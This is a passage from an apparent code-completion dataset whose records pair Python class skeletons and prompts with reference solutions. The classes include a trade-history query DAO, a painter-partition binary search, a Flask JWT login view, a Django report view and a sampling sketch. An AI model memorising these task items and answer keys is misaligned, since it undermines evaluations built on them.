'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000368", "length_bytes": 26694, "license_type": "permissive", "methods": [{"docstring": "已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset", "name": "search_by_uid", "signature": "def search_by_uid(self, uid, start, end, mtlogin, page=None)"}, {"docstring": "已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和", "name": "searchsum_by_uid", "signature": "def searchsum_by_uid(self, uid, start, end, mtlogin)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003509", "prompt": "Implement the Python class `VTradehistoryDao` described below.\n\nClass description:\nv_tradehistory视图操作\n\nMethod signatures and docstrings:\n- def search_by_uid(self, uid, start, end, mtlogin, page=None): 已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\n- def searchsum_by_uid(self, uid, start, end, mtlogin): 已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和", "prompted_full_text": "Implement the Python class `VTradehistoryDao` described below.\n\nClass description:\nv_tradehistory视图操作\n\nMethod signatures and docstrings:\n- def search_by_uid(self, uid, start, end, mtlogin, page=None): 已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\n- def searchsum_by_uid(self, uid, start, end, mtlogin): 已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\n\n<|skeleton|>\nclass VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n <|body_0|>\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, 
VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n return Pagination(query=query, page=page)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n<|end_body_1|>\n", "revision_id": "1fadeecf31f1d25e258dc5d70c47a785f7b33961", "skeleton": "<|skeleton|>\nclass VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n <|body_0|>\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VTradehistoryDao:\n \"\"\"v_tradehistory视图操作\"\"\"\n\n def search_by_uid(self, uid, start, end, mtlogin, page=None):\n \"\"\"已知用户id,根据时间段,查询交易订单 :param uid:用户id :param start:起始时间 :param end:结束时间 :param page:请求页 :return:queryset\"\"\"\n query = self.session.query(VTradehistory.o_time, VTradehistory.o_deal, VTradehistory.login, VTradehistory.symbol, VTradehistory.o_action, VTradehistory.volume, VTradehistory.o_price, VTradehistory.o_commission, VTradehistory.positionid, VTradehistory.c_time, VTradehistory.c_deal, VTradehistory.volumeclosed, VTradehistory.c_price, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n if page == -1:\n return query.all()\n if not page or page == '' or page == 'undefined':\n page = 1\n 
return Pagination(query=query, page=page)\n\n def searchsum_by_uid(self, uid, start, end, mtlogin):\n \"\"\"已知用户id,根据时间段,查询总和 :param uid: 用户id :param start: 开始时间 :param end: 结束时间 :return: 各项总和\"\"\"\n query = self.session.query(VTradehistory.o_time, VTradehistory.login, VTradehistory.profit, VTradehistory.storage, VTradehistory.c_commission, VTradehistory.profitraw).filter(VTradehistory.uid == uid)\n if start and start != '' and (start != 'undefined'):\n query = query.filter(VTradehistory.o_time >= start)\n if end and end != '' and (end != 'undefined'):\n query = query.filter(VTradehistory.o_time <= end)\n if mtlogin and mtlogin != '' and (mtlogin != 'undefined'):\n query = query.filter(VTradehistory.login == mtlogin)\n sum_list = []\n profit_sum = 0\n storage_sum = 0\n c_commission_sum = 0\n profitraw_sum = 0\n for obj in query:\n profit_sum = profit_sum + obj.profit\n storage_sum = storage_sum + obj.storage\n c_commission_sum = c_commission_sum + obj.c_commission\n profitraw_sum = profitraw_sum + obj.profitraw\n sum_list.append({'profit_sum': str(profit_sum), 'storage_sum': str(storage_sum), 'c_commission_sum': str(c_commission_sum), 'profitraw_sum': str(profitraw_sum)})\n return sum_list\n", "source": "the_stack_v2_python_sparse", "source_path": "xwcrm/model/views.py", "source_repo": "MSUNorg/XWCRM", "split": "test", "star_events_count": 0} {"blob_id": "ec4e5c5999395d3c5f1cc232113ab435b89bb07a", "bodies": ["total = 0\npainters = 1\nfor length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\nreturn painters", "low = max(array)\nhigh = sum(array)\nwhile low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\nm = 10000003\nreturn low % m * (t % m) % m"], "bodies_text": "<|body_start_0|>\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n<|end_body_0|>\n\n<|body_start_1|>\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n <|body_0|>\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). 
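The VTradehistoryDao record above carries Chinese docstrings — roughly, "query a user's trade orders over a time window" and "sum the totals for the same window" — and repeats the guard `value and value != '' and value != 'undefined'` before each optional filter ('undefined' being what a JavaScript frontend sends for a missing field). A hedged refactoring sketch of that guard plus the running-sum loop, with the SQLAlchemy query swapped for a list of dicts so it runs standalone:

```python
def provided(value):
    # Collapses the record's three-way check into one membership test.
    return value not in (None, '', 'undefined')

def trade_sums(rows, start=None, end=None, mtlogin=None):
    if provided(start):
        rows = [r for r in rows if r['o_time'] >= start]
    if provided(end):
        rows = [r for r in rows if r['o_time'] <= end]
    if provided(mtlogin):
        rows = [r for r in rows if r['login'] == mtlogin]
    totals = {'profit_sum': 0, 'storage_sum': 0,
              'c_commission_sum': 0, 'profitraw_sum': 0}
    for r in rows:
        totals['profit_sum'] += r['profit']
        totals['storage_sum'] += r['storage']
        totals['c_commission_sum'] += r['c_commission']
        totals['profitraw_sum'] += r['profitraw']
    return totals

rows = [
    {'o_time': '2024-01-02', 'login': 7, 'profit': 10.0, 'storage': -0.5,
     'c_commission': -1.0, 'profitraw': 11.5},
    {'o_time': '2024-01-05', 'login': 8, 'profit': -4.0, 'storage': 0.0,
     'c_commission': -1.0, 'profitraw': -3.0},
]
assert trade_sums(rows, start='2024-01-01', mtlogin=7)['profit_sum'] == 10.0
```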
Space complexity: O(1), n is len(array).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n<|end_body_0|>\n\n<|body_start_1|>\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000369", "length_bytes": 1522, "license_type": "no_license", "methods": [{"docstring": "Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).", "name": "count_painters", "signature": "def count_painters(self, array, max_length)"}, {"docstring": "Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).", "name": "paint", "signature": "def paint(self, k, t, array)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002953", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def count_painters(self, array, max_length): Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\n- def paint(self, k, t, array): Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def count_painters(self, array, max_length): Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\n- def paint(self, k, t, array): Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\n\n<|skeleton|>\nclass Solution:\n\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n <|body_0|>\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). 
Space complexity: O(1), n is len(array).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n<|end_body_0|>\n\n<|body_start_1|>\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n<|end_body_1|>\n", "revision_id": "71b722ddfe8da04572e527b055cf8723d5c87bbf", "skeleton": "<|skeleton|>\nclass Solution:\n\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n <|body_0|>\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). Space complexity: O(1), n is len(array).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def count_painters(self, array, max_length):\n \"\"\"Returns total number of painters, that we're gonna need if we use max_length as maximum boards' length that each painter is gonna paint. Time complexity: O(n). Space complexity: O(1), n is len(array).\"\"\"\n total = 0\n painters = 1\n for length in array:\n total += length\n if total > max_length:\n painters += 1\n total = length\n return painters\n\n def paint(self, k, t, array):\n \"\"\"Returns minimum time required to paint all the boards. Time complexity: O(n * lg(sum(array))). 
Space complexity: O(1), n is len(array).\"\"\"\n low = max(array)\n high = sum(array)\n while low < high:\n mid = (low + high) // 2\n painters = self.count_painters(array, mid)\n if painters <= k:\n high = mid\n else:\n low = mid + 1\n m = 10000003\n return low % m * (t % m) % m\n", "source": "the_stack_v2_python_sparse", "source_path": "Binary_Search/painter_partition.py", "source_repo": "vladn90/Algorithms", "split": "test", "star_events_count": 0} {"blob_id": "27881459c062757b34a543afb193c0f47cb0dc66", "bodies": ["user = g.login_user\nbuckets_count, files_count, files_size, files_types = user_space_count(user)\nuser.buckets_count = buckets_count\nuser.files_count = files_count\nuser.files_size = files_size\nuser.files_types = files_types\nreturn success_response(data=user)", "body_data = request.get_json()\nuser = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\nif user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\nif not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\nexpire_time = datetime.now() + timedelta(minutes=30)\ntoken = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\nuser.last_login_time = datetime.now()\nuser.last_login_ip = request.remote_addr\ndb.session.commit()\nreturn success_response(data={'token': token.decode('UTF-8')})"], "bodies_text": "<|body_start_0|>\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n<|end_body_0|>\n\n<|body_start_1|>\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n<|end_body_1|>\n", "class_docstring": "", "class_name": "UserLogin", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserLogin:\n\n def get(self):\n \"\"\"当前登录用户\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"用户登录\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n<|end_body_0|>\n\n<|body_start_1|>\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, 
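Note on the painter-partition record above: paint is a textbook binary search on the answer. count_painters(array, L) is non-increasing in L, so the smallest per-painter workload that at most k painters can cover is bisected between max(array) (the largest board must fit somewhere) and sum(array) (one painter takes everything), and the result is scaled by the per-unit time t modulo 10000003. A minimal standalone check, with the record's two bodies recast as plain functions; the test values are mine, not from the source repo:

def count_painters(array, max_length):
    # Greedy left-to-right packing: open a new painter whenever the
    # running total would exceed the allowed per-painter workload.
    total, painters = 0, 1
    for length in array:
        total += length
        if total > max_length:
            painters += 1
            total = length
    return painters

def paint(k, t, array):
    # Bisect the smallest workload that still needs at most k painters.
    low, high = max(array), sum(array)
    while low < high:
        mid = (low + high) // 2
        if count_painters(array, mid) <= k:
            high = mid
        else:
            low = mid + 1
    m = 10000003
    return (low % m) * (t % m) % m

assert paint(2, 5, [1, 10]) == 50         # second painter takes the 10-unit board alone
assert paint(10, 1, [1, 8, 11, 3]) == 11  # painters to spare: answer is the largest board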
message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000370", "length_bytes": 2556, "license_type": "no_license", "methods": [{"docstring": "当前登录用户", "name": "get", "signature": "def get(self)"}, {"docstring": "用户登录", "name": "post", "signature": "def post(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005060", "prompt": "Implement the Python class `UserLogin` described below.\n\nClass description:\nImplement the UserLogin class.\n\nMethod signatures and docstrings:\n- def get(self): 当前登录用户\n- def post(self): 用户登录", "prompted_full_text": "Implement the Python class `UserLogin` described below.\n\nClass description:\nImplement the UserLogin class.\n\nMethod signatures and docstrings:\n- def get(self): 当前登录用户\n- def post(self): 用户登录\n\n<|skeleton|>\nclass UserLogin:\n\n def get(self):\n \"\"\"当前登录用户\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"用户登录\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n<|end_body_0|>\n\n<|body_start_1|>\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n<|end_body_1|>\n", "revision_id": "c0ec16c0144d3754e67e295babef4417703102dc", "skeleton": "<|skeleton|>\nclass UserLogin:\n\n def get(self):\n \"\"\"当前登录用户\"\"\"\n <|body_0|>\n\n def post(self):\n \"\"\"用户登录\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserLogin:\n def get(self):\n \"\"\"当前登录用户\"\"\"\n user = g.login_user\n buckets_count, files_count, files_size, files_types = user_space_count(user)\n user.buckets_count = buckets_count\n user.files_count = files_count\n user.files_size = files_size\n user.files_types = files_types\n return success_response(data=user)\n\n def post(self):\n \"\"\"用户登录\"\"\"\n body_data = request.get_json()\n user = db.session.query(User).filter(or_(User.email == body_data['username'], User.username == body_data['username'])).first()\n if user is None:\n raise 
ProfileError(code=404, message={'username': \"No enable user's username or email is {0}!\".format(body_data['username'])})\n if not user.check_password(body_data['password']):\n raise ProfileError(code=400, message={'password': 'Your password is wrong!'})\n expire_time = datetime.now() + timedelta(minutes=30)\n token = jwt.encode({'user_id': user.id, 'expire': expire_time.timestamp()}, key=current_app.config['SECRET_KEY'])\n user.last_login_time = datetime.now()\n user.last_login_ip = request.remote_addr\n db.session.commit()\n return success_response(data={'token': token.decode('UTF-8')})\n", "source": "the_stack_v2_python_sparse", "source_path": "nemi_flask/Api_v1_0/namespace_auth/views.py", "source_repo": "Athrun1027/Nemi", "split": "test", "star_events_count": 1} {"blob_id": "0cb010fec95294db88560c917b9bb2ec7568225b", "bodies": ["form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\nform.instance.type = 'PF'\nreturn super().form_valid(form)", "context = super().get_context_data(**kwargs)\ncontext['name'] = Profile.objects.get(pk=self.kwargs['id']).name\nreturn context"], "bodies_text": "<|body_start_0|>\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "class_docstring": "Class based view for reporting profile", "class_name": "ProfileReportForm", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000371", "length_bytes": 10733, "license_type": "permissive", "methods": [{"docstring": "Ensures hidden form values are filled", "name": "form_valid", "signature": "def form_valid(self, form)"}, {"docstring": "Passes item name to template", "name": "get_context_data", "signature": "def get_context_data(self, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005940", "prompt": "Implement the Python class `ProfileReportForm` described below.\n\nClass description:\nClass based view for reporting profile\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template", "prompted_full_text": "Implement the Python class `ProfileReportForm` described below.\n\nClass description:\nClass based view for reporting profile\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template\n\n<|skeleton|>\nclass ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n 
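Portability note on the UserLogin record above: token.decode('UTF-8') assumes PyJWT 1.x, where jwt.encode returns bytes; from PyJWT 2.0 onward it returns str and the .decode call raises AttributeError. A version-tolerant variant of the token-issuing step (a sketch with hypothetical names, not the repo's code):

import jwt  # PyJWT
from datetime import datetime, timedelta

def issue_token(user_id, secret_key):
    expire_time = datetime.now() + timedelta(minutes=30)
    token = jwt.encode({'user_id': user_id, 'expire': expire_time.timestamp()},
                       key=secret_key, algorithm='HS256')
    # PyJWT < 2.0 returns bytes, >= 2.0 returns str; normalize to str.
    return token.decode('UTF-8') if isinstance(token, bytes) else token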
<|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "revision_id": "6bf8e75a1f279ac584daa4ee19927ffccaa67551", "skeleton": "<|skeleton|>\nclass ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProfileReportForm:\n \"\"\"Class based view for reporting profile\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'PF'\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n context = super().get_context_data(**kwargs)\n context['name'] = Profile.objects.get(pk=self.kwargs['id']).name\n return context\n", "source": "the_stack_v2_python_sparse", "source_path": "rameniaapp/views/report.py", "source_repo": "awlane/ramenia", "split": "test", "star_events_count": 0} {"blob_id": "8be088dda6bf281c0a914a1d9b5ca899b01e3fc0", "bodies": ["self.k = k\nself.elements = {}\nself.func_of_freq = lambda x: x ** p\nself.sample_p = sample_p", "if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\nseed = np.random.exponential(1.0 / value ** self.sample_p)\nself.elements[key] = (seed, value)\nif len(self.elements) > 2 * self.k:\n self._remove_additional_elements()", "sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\nfor i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]", "if len(self.elements) > self.k:\n self._remove_additional_elements()\nmax_in_sample = max(self.elements.items(), key=lambda x: x[1][0])\nthreshold = max_in_sample[1][0]\nsum_estimator = 0.0\nfor key, (seed, count) in self.elements.items():\n if key != max_in_sample[0]:\n if count ** self.sample_p * threshold < 2.0 ** (-24):\n print('(count**self.sample_p) * threshold < 2^{-24}')\n print(count ** self.sample_p * threshold)\n inc_pr = 1.0 - np.exp(-1.0 * count ** self.sample_p * threshold)\n estimator = self.func_of_freq(count) / inc_pr\n sum_estimator += estimator\nreturn sum_estimator"], "bodies_text": "<|body_start_0|>\n self.k = k\n self.elements = {}\n self.func_of_freq = lambda x: x ** p\n self.sample_p = sample_p\n<|end_body_0|>\n\n<|body_start_1|>\n if key in self.elements:\n raise Exception('This implementation works only for aggregated data')\n seed = np.random.exponential(1.0 / value ** self.sample_p)\n self.elements[key] = (seed, value)\n if len(self.elements) > 2 * self.k:\n self._remove_additional_elements()\n<|end_body_1|>\n\n<|body_start_2|>\n sorted_elements = sorted(self.elements.items(), key=lambda x: x[1][0])\n for i in range(self.k, len(sorted_elements)):\n del self.elements[sorted_elements[i][0]]\n<|end_body_2|>\n\n<|body_start_3|>\n if len(self.elements) > self.k:\n 
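Context for the ProfileReportForm record above: both methods delegate to super(), so the mixin only makes sense on a form-handling class-based view such as django.views.generic.CreateView, with the profile id captured as <id> in the URLconf. A plausible host class; the model, fields, and template name below are hypothetical stand-ins, not taken from the source repo:

from django.views.generic.edit import CreateView
from myapp.models import Profile, Report  # hypothetical app and models

class ProfileReportForm(CreateView):
    model = Report                      # hypothetical report model
    fields = ['reason']                 # visible fields; profile/type stay hidden
    template_name = 'report_form.html'

    def form_valid(self, form):
        # Fill the hidden values before CreateView saves the form,
        # exactly as the record's body does.
        form.instance.profile = Profile.objects.get(pk=self.kwargs['id'])
        form.instance.type = 'PF'
        return super().form_valid(form)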
